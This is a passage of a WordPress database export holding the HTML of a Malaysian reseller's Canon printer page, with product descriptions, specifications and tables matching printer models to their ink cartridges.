(Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 10:07:50','2019-09-25 02:07:50','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3325,1,'2019-09-25 10:03:07','2019-09-25 02:03:07','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<p>Â </p><table border=\"1\" width=\"378\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td><td>Maintenance Cartridge MC-20</td></tr><tr><td>PFI-50 (Blue)</td></tr><tr><td>PFI-50 (Chroma Optimizer)</td></tr><tr><td>PFI-50 (Cyan)</td></tr><tr><td>PFI-50 (Gray)</td></tr><tr><td>PFI-50 (Magenta)</td></tr><tr><td>PFI-50 (Matte Black)</td></tr><tr><td>PFI-50 (Photo Black)</td></tr><tr><td>PFI-50 (Photo Cyan)</td></tr><tr><td>PFI-50 (Photo Gray)</td></tr><tr><td>PFI-50 (Photo Magenta)</td></tr><tr><td>PFI-50 (Red)</td></tr><tr><td>PFI-50 (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td><td>PGI-2700 (Black)</td></tr><tr><td>PGI-2700 (Cyan)</td></tr><tr><td>PGI-2700 (Magenta)</td></tr><tr><td>PGI-2700 (Yellow)</td></tr><tr><td>PGI-2700XL (Black)</td></tr><tr><td>PGI-2700XL (Cyan)</td></tr><tr><td>PGI-2700XL (Magenta)</td></tr><tr><td>PGI-2700XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E3170</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E410</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr></tbody></table><p>Â </p><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E4270</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA E470</td><td>CL-57 (Colour)</td></tr><tr><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E477</td><td>CL-57S (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E480</td><td>CL-57 (Colour)</td></tr><tr><td>PG-47 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E510</td><td>CL-98 (Colour)</td></tr><tr><td>PG-88 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E560</td><td>CL-99 (Colour)</td></tr><tr><td>PG-89 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td><td>CL-99 (Colour)</td></tr><tr><td>PG-89 (Pigment Black)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G1000</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G1010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G2010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G3000</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G3010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA G4010</td><td>GI-790 (Black)</td></tr><tr><td>GI-790 (Cyan)</td></tr><tr><td>GI-790 (Magenta)</td></tr><tr><td>GI-790 (Yellow)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP100</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP110</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td><td>CLI-36 (Colour)</td></tr><tr><td>PGI-35 (Pigment Black)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA iP1300</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td><td>CL-746 (Colour)</td></tr><tr><td>CL-746S (Colour)</td></tr><tr><td>PG-745 (Pigment Black)</td></tr><tr><td>PG-745S (Pigment Black)</td></tr></tbody></table><p>Â </p><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA iP4200</td><td>CLI-8 (Black)</td></tr><tr><td>CLI-8 (Cyan)</td></tr><tr><td>CLI-8 (Magenta)</td></tr><tr><td>CLI-8 (Yellow)</td></tr><tr><td>PGI-5 (Pigment Black)</td></tr><tr><td rowspan=\"10\" align=\"center\">PIXMA iP7270</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td rowspan=\"12\" align=\"center\">PIXMA iP8770</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Gray)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Gray)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td rowspan=\"11\" align=\"center\">PIXMA iX6770</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td>PGI-755XXL (Pigment Black)</td></tr><tr><td rowspan=\"11\" align=\"center\">PIXMA iX6870</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td>PGI-750 (Pigment Black)</td></tr><tr><td>PGI-750XL (Pigment Black)</td></tr><tr><td>PGI-755XXL (Pigment 